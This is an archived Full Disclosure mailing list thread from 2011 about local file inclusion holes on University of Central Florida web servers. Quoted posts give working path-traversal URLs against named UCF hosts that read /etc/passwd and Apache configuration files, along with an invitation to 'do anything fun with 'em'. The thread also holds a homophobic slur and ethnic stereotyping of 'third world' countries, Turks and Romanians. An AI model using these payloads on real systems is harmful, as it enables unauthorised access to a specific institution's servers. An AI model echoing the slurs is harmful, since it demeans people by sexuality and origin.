Full Disclosure mailing list archives

Re: University of Central Florida Multiple LFI


From: Nikhil Mittal <nikhil_uitrgpv () yahoo co in>
Date: Mon, 21 Feb 2011 19:18:42 +0530 (IST)


Madhur Ahuja and "Hack Talk" are obviously from third world countries 
and are only doing this for publicity


So fag, what you would have done it for ? Free gay sex with Administrators from the University ?

You felt bad if kids from so called "Third World" countries used FD for some adventure. Come on get past this "Third 
World" mentality.

--- On Sat, 19/2/11, full-disclosure-request () lists grok org uk <full-disclosure-request () lists grok org uk> wrote:

From: full-disclosure-request () lists grok org uk <full-disclosure-request () lists grok org uk>
Subject: Full-Disclosure Digest, Vol 72, Issue 45
To: full-disclosure () lists grok org uk
Date: Saturday, 19 February, 2011, 10:42 PM


Message: 12
Date: Sat, 19 Feb 2011 11:48:22 -0500
From: Eyeballing Weev <eyeballing.weev () gmail com>
Subject: Re: [Full-disclosure] University of Central Florida Multiple
    LFI
To: full-disclosure () lists grok org uk
Message-ID: <4D5FF456.3000503 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Madhur Ahuja and "Hack Talk" are obviously from third world countries 
and are only doing this for publicity, much like how Turks and Romanians 
"hack" into websites for defacement purposes. Same concept just applied 
differently.

On 02/19/2011 11:45 AM, Shawn Merdinger wrote:
Hi,

At the risk of being ridiculed here, I'll point out that UCF does have
a Infosec office and a incident response POC.

https://publishing.ucf.edu/sites/itr/cst/Pages/IncidentResponse.aspx
sirt () mail ucf edu

fwiw, security folks in .edus are at the low-end of this industry's
pay-scale and it's difficult to find/retain qualified people, not to
mention adequate budget for purchasing (even more) crappy security
products and almost no budget for professional development like
training and conferences.

I would expect there are more challenging targets out there, were one
inclined...

Cheers,
--scm


On Sat, Feb 19, 2011 at 06:04, Madhur Ahuja<ahuja.madhur () gmail com>  wrote:
http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00

On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk<hacktalkblog () gmail com>  wrote:

Found these and thought I'd share:

-==================-

http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00

http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
-==================-
Let me know if you do anything fun with 'em

Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread: